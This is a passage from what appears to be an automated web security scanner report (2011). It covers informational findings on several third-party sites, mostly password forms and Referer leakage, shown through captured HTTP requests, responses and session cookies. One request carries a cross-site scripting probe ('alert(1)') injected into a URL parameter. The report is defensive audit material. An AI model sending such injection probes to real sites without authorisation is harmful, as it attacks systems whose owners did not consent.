GET /login.asp?status=failed HTTP/1.1/login.asp/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3+server&Referrer=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF%2D8%26q%3Dsmtp%2Bserver&Search=g; ASPSESSIONIDSCTSBTQQ=PLBPJOABDACEOGJJFNFHKHNJ; __utma=213119631.1093174196.1316204842.1316204842.1316204842.1; __utmb=213119631.5.10.1316204842; __utmc=213119631; __utmz=213119631.1316204842.1.1.utmgclid=CKGSi_aJoqsCFRdTgwod5zgZiw|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; _chartbeat2=vs5g6yeo9lxk52er.1316204846394; ASPSESSIONIDSCTWBTQQ=DJNPJOABFNFKEADPKMALIIHA
Response
HTTP/1.1 200 OK+server&Referrer=http%3A%2F%2Fwww%2Ejangosmtp%2Ecom%2Flogin%2Easp&Search=g; expires=Fri, 16-Dec-2011 16:30:42 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml">...[SNIP]... <form action="https://www.jangosmtp.com/APPLICATION/processlogin.asp" method="post" name="loginform" id="loginform"> ...[SNIP]... <input type="password" name="password" size="30" maxlength="15"> <a href="PasswordReset.asp" style="font-size:10pt;">...[SNIP]...
12.31. https://www.smtp.com/signup
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.smtp.com
Path:
/signup
Issue detail
The page contains a form with the following action URL:https://www.smtp.com/signup order[customer][password] order[customer][password_confirmation]
Request
GET /signup HTTP/1.1/service-info/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3=BAh7BzoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOg9zZXNzaW9uX2lkIiU4MjMyOWNjODZhNDNhYzBhOTM0NTM0NDczOGRiZjVlNQ%3D%3D--d77601bf4eb2e4d6e70d9401d391108ccdbc2dbd; __utma=173546785.673105426.1316204863.1316204863.1316204863.1; __utmb=173546785.2.10.1316204863; __utmc=173546785; __utmz=173546785.1316204863.1.1.utmgclid=CJWNm_2JoqsCFSg1gwodCS0_kQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server
Response
HTTP/1.1 200 OK5fb6813a39fd7"=BAh7CDoRaHR0cF9yZWZlcmVyIkhodHRwOi8vd3d3Lmdvb2dsZS5jb20vc2VhcmNoP3NvdXJjZWlkPWNocm9tZSZpZT1VVEYtOCZxPXNtdHArc2VydmVyOhBfY3NyZl90b2tlbiIxcVNXak9kck5TK2dKaGYwUEtoUjQ4UGpNTGozeC9RejlGUjM0a0xZTEpzND06D3Nlc3Npb25faWQiJTgyMzI5Y2M4NmE0M2FjMGE5MzQ1MzQ0NzM4ZGJmNWU1--9d864407dc9132ffb7b5e9c9928c23d380537ed3; path=/; HttpOnly/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en">...[SNIP]... <form action="https://www.smtp.com/signup" id="registration-form" method="post"> <div style="margin:0;padding:0;display:inline">...[SNIP]... <input class="text" id="order_customer_password" name="order[customer][password]" size="30" tabindex="6" type="password" /> ...[SNIP]... <input class="text" id="order_customer_password_confirmation" name="order[customer][password_confirmation]" size="30" tabindex="7" type="password" /> ...[SNIP]...
12.32. http://www.thewhir.com/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.thewhir.com
Path:
/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites
Issue detail
The page contains a form with the following action URL:http://www.thewhir.com/Auth/login
Request
GET /web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=godaddy+hack#sclient=psy-ab&hl=en&tbo=1&tbs=qdr:w&source=hp&q=godaddy%20malware%20attack&pbx=1&oq=&aq=&aqi=&aql=&gs_sm=&gs_upl=&tbo=1&fp=1&biw=1407&bih=1005&pf=p&pdl=500&bav=on.2,or.r_gc.r_pw.&cad=b/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.co...[SNIP]... <form action="/Auth/login" method="post"> ...[SNIP]... <input name="password" type="password" class="input" /> <br />...[SNIP]...
13. Referer-dependent response
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://help.securepaynet.net
Path:
/article/4714
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
Request 1
GET /article/4714 HTTP/1.1Referer: http://help.securepaynet.net/topic/168/article/5246?plid= /xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 1
HTTP/1.1 200 OK...[SNIP]... .net/image.aspx?page=%2Farticle%2F4714&referrer=http%3A%2F%2Fhelp.securepaynet.net%2Ftopic%2F168%2Farticle%2F5246%3Fplid%3D&site=help.securepaynet.net&server=m1plgdhelp004&status=200&article_id=4714&locale=en&topic_id=167" class="gdti" border="0" width="1" height="1" style="width: 1px; height: 1px; border: 0; margin: 0; padding: 0; position: absolute; top: 1em; left: 0.5em;" alt="" /><a rel="nofollow" href="/rate/article/4714/1?locale=en" title="Not helpful">Not helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/2?locale=en" title="Somewhat helpful">Somewhat helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/3?locale=en" title="Helpful">Helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/4?locale=en" title="Very Helpful">Very Helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/5?locale=en" title="Solved my problem">Solved my problem</a></li></ul><div class="bottom"></div></div>
Request 2
GET /article/4714 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response 2
HTTP/1.1 200 OK...[SNIP]... .net/image.aspx?page=%2Farticle%2F4714&site=help.securepaynet.net&server=m1plgdhelp006&status=200&article_id=4714&locale=en&topic_id=167" class="gdti" border="0" width="1" height="1" style="width: 1px; height: 1px; border: 0; margin: 0; padding: 0; position: absolute; top: 1em; left: 0.5em;" alt="" /><a rel="nofollow" href="/rate/article/4714/1?locale=en" title="Not helpful">Not helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/2?locale=en" title="Somewhat helpful">Somewhat helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/3?locale=en" title="Helpful">Helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/4?locale=en" title="Very Helpful">Very Helpful</a></li><li><a rel="nofollow" href="/rate/article/4714/5?locale=en" title="Solved my problem">Solved my problem</a></li></ul><div class="bottom"></div></div>
14. Cross-domain POST
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://thehackernews.com
Path:
/2011/09/godaddy-websites-compromised-with.html
Issue detail
The page contains a form which POSTs data to the domain feedburner.google.com . The form contains the following fields:
Issue background
The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.
Request
GET /2011/09/godaddy-websites-compromised-with.html HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1834991741.1316213726.1316213726.1316213726.1; __utmb=93595608.1.10.1316213726; __utmc=93595608; __utmz=93595608.1316213726.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK-2456f7bca899"/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml' xmlns:b='http://www.google.com/2005/g...[SNIP]... <form action='http://feedburner.google.com/fb/a/mailverify' method='post' onsubmit='window.open('http://feedburner.google.com/fb/a/mailverify?uri=TheHackersNews', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true' style='border: 1px solid rgb(204, 204, 204); padding: 3px; text-align: center;' target='popupwindow'> <p align='center'>...[SNIP]...
15. Cross-domain Referer leakage
previous
next
There are 82 instances of this issue:
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
15.1. http://a.collective-media.net/cmadj/ds.home/default
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://a.collective-media.net
Path:
/cmadj/ds.home/default
Issue detail
The page was loaded from a URL containing a query string:http://a.collective-media.net/cmadj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? http://c.betrad.com/a/4.gif
Request
GET /cmadj/ds.home/default;cmn=wfm;ugc=0;!c=ds;sz=300x250;ux=2ee636e8-ffbb-4707-83f7-1e5c10da5819;pos=top;u=ds;dcopt=ist;ptile=1;s=ds.home;z=default;net=wfm;ord=110916093024416?;ord1=216411;cmpgurl=http%253A//www.drugstore.com/? HTTP/1.1;q=0.7
Response
HTTP/1.1 200 OK.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE".net; path=/; expires=Fri, 23-Sep-2011 16:30:30 GMT.net; path=/; expires=Fri, 23-Sep-2011 16:30:30 GMT.net; path=/; expires=Fri, 23-Sep-2011 16:30:30 GMT.net; path=/; expires=Fri, 23-Sep-2011 16:30:30 GMT;function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i...[SNIP]... /datapair?net=vt",false);var bap_rnd = Math.floor(Math.random()*100000);<img style="margin:0;padding:0;" border="0" width="0" height="0" src="http://c.betrad.com/a/4.gif" id="bap-pixel-'+bap_rnd+'"/> ');ntById('ba.js')) return;'ript id="ba.js" type="text/javascript" src="http://c.betrad.com/geo/ba.js">...[SNIP]...
15.2. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=button1;sz=125x125;tile=3;ord=76329187210.64925? http://s0.2mdn.net/viewad/1559765/Parallels07_automation125x125c_022311.gif
Request
GET /adj/inet.whir/news;pos=button1;sz=125x125;tile=3;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/n;242481541;0-0;1;61214754;3-125/125;41662720/41680507/1;;~sscs=%3fhttp://www.parallels.com/cloudthought"><img src="http://s0.2mdn.net/viewad/1559765/Parallels07_automation125x125c_022311.gif" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.3. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;sz=300x100;tile=7;ord=76329187210.64925? http://s0.2mdn.net/viewad/1559740/LiquidWeb_storm_300x100_082510.gif
Request
GET /adj/inet.whir/news;sz=300x100;tile=7;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/l;246286525;0-0;0;61214754;3823-300/100;41946901/41964688/1;;~sscs=%3fhttps://www.stormondemand.com/cloud-hosting/campaign/YRT6zwyKF-up8RhkhrDKE8DtQhI"><img src="http://s0.2mdn.net/viewad/1559740/LiquidWeb_storm_300x100_082510.gif" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.4. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;sz=300x250;pos=mrec1;tile=8;ord=76329187210.64925? http://s0.2mdn.net/viewad/1765432/R1Soft_300x250_banner_072611.gif
Request
GET /adj/inet.whir/news;sz=300x250;pos=mrec1;tile=8;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/w;243065997;0-0;0;61214754;4307-300/250;43261374/43279161/1;;~sscs=%3fhttp://www.r1soft.com/index.php?id=718&utm_source=thewhir.com&utm_medium=banner&utm_campaign=q2promo"><img src="http://s0.2mdn.net/viewad/1765432/R1Soft_300x250_banner_072611.gif" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.5. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=button4;sz=125x125;tile=6;ord=76329187210.64925? http://s0.2mdn.net/viewad/3150196/WhirMag_125x125_July2011.jpg
Request
GET /adj/inet.whir/news;pos=button4;sz=125x125;tile=6;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/q;244728232;0-0;4;61214754;3-125/125;43486777/43504564/1;;~sscs=%3fhttp://www.thewhir.com/Magazine/11-July"><img src="http://s0.2mdn.net/viewad/3150196/WhirMag_125x125_July2011.jpg" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.6. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=button2;sz=125x125;tile=4;ord=76329187210.64925? http://s0.2mdn.net/viewad/3150196/WHIR_125x125-EVENT-SCOTTSDALE_2011.jpg
Request
GET /adj/inet.whir/news;pos=button2;sz=125x125;tile=4;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/r;245729415;0-0;1;61214754;3-125/125;42682125/42699912/1;;~sscs=%3fhttp://www.thewhir.com/whir-events/092211_Scottsdale"><img src="http://s0.2mdn.net/viewad/3150196/WHIR_125x125-EVENT-SCOTTSDALE_2011.jpg" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.7. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=bottom;sz=728x90;tile=9;ord=76329187210.64925? http://s0.2mdn.net/viewad/2253104/070711_servint_whir_728x90.gif
Request
GET /adj/inet.whir/news;pos=bottom;sz=728x90;tile=9;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/v;243051231;0-0;2;61214754;3454-728/90;43006241/43024028/1;;~sscs=%3fhttp://www.servint.net/index.php?affid=3014"><img src="http://s0.2mdn.net/viewad/2253104/070711_servint_whir_728x90.gif" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.8. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=topright;sz=146x96;tile=2;ord=76329187210.64925? http://s0.2mdn.net/viewad/3289971/Dell_146x96_anim_081111_3000ms-delay.gif
Request
GET /adj/inet.whir/news;pos=topright;sz=146x96;tile=2;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/a;243993375;0-0;1;61214754;10106-146/96;43548967/43566754/1;;~sscs=%3fhttp://www.Dell.com/PowerEdgeC"><img src="http://s0.2mdn.net/viewad/3289971/Dell_146x96_anim_081111_3000ms-delay.gif" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.9. http://ad.doubleclick.net/adj/inet.whir/news
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/inet.whir/news
Issue detail
The page was loaded from a URL containing a query string:http://ad.doubleclick.net/adj/inet.whir/news;pos=button3;sz=125x125;tile=5;ord=76329187210.64925? http://s0.2mdn.net/viewad/3327599/Hostapalooza_125_090111.jpg
Request
GET /adj/inet.whir/news;pos=button3;sz=125x125;tile=5;ord=76329187210.64925? HTTP/1.1/web-hosting-news/091611_Go_Daddy_Helping_Customers_Repair_Compromised_Sites;q=0.3
Response
HTTP/1.1 200 OK.doubleclick.net/click;h=v8/3b84/0/0/%2a/x;245498339;0-0;1;61214754;3-125/125;43734729/43752516/1;;~sscs=%3fhttp://www.hostapaloooza.com/click/whir.php"><img src="http://s0.2mdn.net/viewad/3327599/Hostapalooza_125_090111.jpg" border=0 alt="Click here to find out more!"> </a>...[SNIP]...
15.10. http://cdn.sendgrid.com/js/sg.gz.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cdn.sendgrid.com
Path:
/js/sg.gz.js
Issue detail
The page was loaded from a URL containing a query string:http://cdn.sendgrid.com/js/sg.gz.js?r=1315865266 http://player.vimeo.com/video/23283604?&api=1&id=vimeoplayer&autoplay=1
Request
GET /js/sg.gz.js?r=1315865266 HTTP/1.1/pricing.html?gclid=CPWo1PSJoqsCFRRSgwod8HVslQ;q=0.3&token:_mch-sendgrid.com-1316204836485-43033; __utma=139434414.731002222.1316204836.1316204836.1316204836.1; __utmb=139434414.2.10.1316204836; __utmc=139434414; __utmz=139434414.1316204836.1.1.utmgclid=CPWo1PSJoqsCFRRSgwod8HVslQ|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=smtp%20server; __ptca=111872475.dUUOzxbhAvTn.1316222838.1316222838.1316222838.1; __ptv_0a6gTR=dUUOzxbhAvTn; __pti_0a6gTR=dUUOzxbhAvTn; __ptcc=1; __ptcs=111872475.1.10.1316222838; __ptcz=111872475.1316222838.1.0.ptmcsr=google|ptmcmd=organic|ptmccn=(organic)|ptmctr=smtp+server|ptmcex=9GFPhk.3Gp89g.1|ptmcx2=9GFPhk.3Gp89g.1
Response
HTTP/1.0 200 OKw9czHZqGNvIbLmooYxyunI/8yLNsY6n1YV8KVndV15TJ23a49934618dc"7662888a9807c22b40c6d55243745591b197c86cf9a4e9a8513118fd9c3a4a1d396be659.cloudfront.net:11180 (CloudFront), 1.0 3699e83baef736bc2f2d3eba34fbb977.cloudfront.net:11180 (CloudFront).html();...[SNIP]... (function(){('<iframe src="http://player.vimeo.com/video/23283604?&api=1&id=vimeoplayer&autoplay=1" width="500" height="281" frameborder="0"> </iframe>...[SNIP]...
15.11. http://cm.g.doubleclick.net/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The page was loaded from a URL containing a query string:http://cm.g.doubleclick.net/pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb1_hITZ4OM9aGlxEHSKmRd7_uqx2bJpRQQNM3YerOJkbqNJVUAgugK4H9ttdVJj_xAH0umUj6_KTr1kfvYGv0ZO-NVQZzQ http://a.tellapart.com/dclkmatch?nid=&uid=ABJeb1_hITZ4OM9aGlxEHSKmRd7_uqx2bJpRQQNM3YerOJkbqNJVUAgugK4H9ttdVJj_xAH0umUj6_KTr1kfvYGv0ZO-NVQZzQ&google_gid=CAESEBLIjS3ntgDBNYw9VyImf1w&google_cver=1
Request
GET /pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb1_hITZ4OM9aGlxEHSKmRd7_uqx2bJpRQQNM3YerOJkbqNJVUAgugK4H9ttdVJj_xAH0umUj6_KTr1kfvYGv0ZO-NVQZzQ HTTP/1.1/*;q=0.5;q=0.7/hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==&tms=1316208686167=1312233693|et=730|cs=002213fd4876a8a011eba88ea7
Response
HTTP/1.1 302 Found/dclkmatch?nid=&uid=ABJeb1_hITZ4OM9aGlxEHSKmRd7_uqx2bJpRQQNM3YerOJkbqNJVUAgugK4H9ttdVJj_xAH0umUj6_KTr1kfvYGv0ZO-NVQZzQ&google_gid=CAESEBLIjS3ntgDBNYw9VyImf1w&google_cver=1;charset=utf-8">><A HREF="http://a.tellapart.com/dclkmatch?nid=&uid=ABJeb1_hITZ4OM9aGlxEHSKmRd7_uqx2bJpRQQNM3YerOJkbqNJVUAgugK4H9ttdVJj_xAH0umUj6_KTr1kfvYGv0ZO-NVQZzQ&google_gid=CAESEBLIjS3ntgDBNYw9VyImf1w&google_cver=1"> here</A>...[SNIP]...
15.12. http://cm.g.doubleclick.net/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The page was loaded from a URL containing a query string:http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_error=1
Request
GET /pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A HTTP/1.1/getSegment.php?purl=http%3A%2F%2Fwww.blackbaud.com%2F&jsref=&rnd=1316204996203;q=0.3
Response
HTTP/1.1 302 Found/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_error=1;charset=utf-8">><A HREF="http://seg.sharethis.com/adxmapping.php?stid=i-048AA00A35CF5E4EC53E553302EE710A&google_error=1"> here</A>...[SNIP]...
15.13. http://cm.g.doubleclick.net/pixel
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://cm.g.doubleclick.net
Path:
/pixel
Issue detail
The page was loaded from a URL containing a query string:http://cm.g.doubleclick.net/pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb18VhNcIWNBiY8iz5yqIkxVXF9PTu4BHUvVUgcYk6QETsn4m8yKwfsuKVAjMiQ9R3jCF6O_k1Z9FIVnUakenjO1Gd16D2g http://a.tellapart.com/dclkmatch?nid=&uid=ABJeb18VhNcIWNBiY8iz5yqIkxVXF9PTu4BHUvVUgcYk6QETsn4m8yKwfsuKVAjMiQ9R3jCF6O_k1Z9FIVnUakenjO1Gd16D2g&google_gid=CAESEPZT2rTkQ6LcywV81v2MJ28&google_cver=1
Request
GET /pixel?google_nid=tellapart&google_cm=&google_sc=&uid=ABJeb18VhNcIWNBiY8iz5yqIkxVXF9PTu4BHUvVUgcYk6QETsn4m8yKwfsuKVAjMiQ9R3jCF6O_k1Z9FIVnUakenjO1Gd16D2g HTTP/1.1/*;q=0.5;q=0.7/hif?p=vobmfNYCXJkpXrtb_UNRwyPDtCMLAAEAAAAQ8VfMRuCtWlGZKHGOFgAdYAsAAgAAABDBNWrL_D1gZ_QvSD7Ubh68CgADAAABMnMTUeAPAAQLAAAABAAAAAI5OQAAAAI3NQAAAAI3NAAAAAMxMDULAAUAAAAMZ01JVlhQT2pId09LAA==bd591%22%3balert(1)//e15fc9eb3e7&tms=1316208686167=1312233693|et=730|cs=002213fd4876a8a011eba88ea7
Response
HTTP/1.1 302 Found/dclkmatch?nid=&uid=ABJeb18VhNcIWNBiY8iz5yqIkxVXF9PTu4BHUvVUgcYk6QETsn4m8yKwfsuKVAjMiQ9R3jCF6O_k1Z9FIVnUakenjO1Gd16D2g&google_gid=CAESEPZT2rTkQ6LcywV81v2MJ28&google_cver=1;charset=utf-8">><A HREF="http://a.tellapart.com/dclkmatch?nid=&uid=ABJeb18VhNcIWNBiY8iz5yqIkxVXF9PTu4BHUvVUgcYk6QETsn4m8yKwfsuKVAjMiQ9R3jCF6O_k1Z9FIVnUakenjO1Gd16D2g&google_gid=CAESEPZT2rTkQ6LcywV81v2MJ28&google_cver=1"> here</A>...[SNIP]...
15.14. https://dev.opera.com/login/wronglogin.dml
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://dev.opera.com
Path:
/login/wronglogin.dml
Issue detail
The page was loaded from a URL containing a query string:https://dev.opera.com/login/wronglogin.dml?username=xss&ref=http%3A%2F%2Fdev.opera.com%2Farticles%2Fjavascript%2F https://static.myopera.com/community/css/loginsignup.css https://static.myopera.com/community/graphics/info.png https://static.myopera.com/favicon.ico
Request
GET /login/wronglogin.dml?username=xss&ref=http%3A%2F%2Fdev.opera.com%2Farticles%2Fjavascript%2F HTTP/1.1/login//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3.1534674535.1316207960.1316207960.1316207960.1; __utmb=122269525.3.10.1316207960; __utmc=122269525; __utmz=122269525.1316207960.1.1.utmcsr=unite.opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/application/192/; __utma=73838855.1311206388.1316208003.1316208003.1316208003.1; __utmb=73838855.4.10.1316208003; __utmc=73838855; __utmz=73838855.1316208003.1.1.utmcsr=opera.com|utmccn=(referral)|utmcmd=referral|utmcct=/company/
Response
HTTP/1.1 200 OKzowMzowMA==-verification" content="L7q_7GF5c9d7ZAUYdfaTiRaB6sTAGv_cRz3nq5DsabM">...[SNIP]... <link rel="shortcut icon" href="https://static.myopera.com:443/favicon.ico" type="image/x-icon"> <link rel="stylesheet" href="https://static.myopera.com/community/css/loginsignup.css" type="text/css"> ...[SNIP]... <img src="https://static.myopera.com/community/graphics/info.png" width="17" height="17" alt=""> Have you <a href="/login/lost-password">...[SNIP]...
15.15. http://go.icontact.com/SEM/AP
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://go.icontact.com
Path:
/SEM/AP
Issue detail
The page was loaded from a URL containing a query string:http://go.icontact.com/SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg https://fls.doubleclick.net/activityi;src=1661185;type=tflan342;cat=tfl413;ord=1?
Request
GET /SEM/AP?ga_campaign=(roi)+moved+ad+groups&ga_adgroup=smtp+service&ga_keyword=SMTP%20service&afid=164592&gclid=COWek_yJoqsCFQhrgwodLzuGZg HTTP/1.1/search?sourceid=chrome&ie=UTF-8&q=smtp+server/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3
Response
HTTP/1.1 200 OK=LBG7YTE7&rid=1286578; domain=icontact.com; expires=Sat, 15-Sep-2012 05:00:00 GMT; path=//xhtml1/DTD/xhtml1-transitional.dtd">/1999/xhtml" lang="en">...[SNIP]... <iframe src="https://fls.doubleclick.net/activityi;src=1661185;type=tflan342;cat=tfl413;ord=1?"; width="1" height="1" frameborder="0" style="display:none"> </iframe>...[SNIP]...
15.16. http://googleads.g.doubleclick.net/pagead/ads
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://googleads.g.doubleclick.net
Path:
/pagead/ads
Issue detail
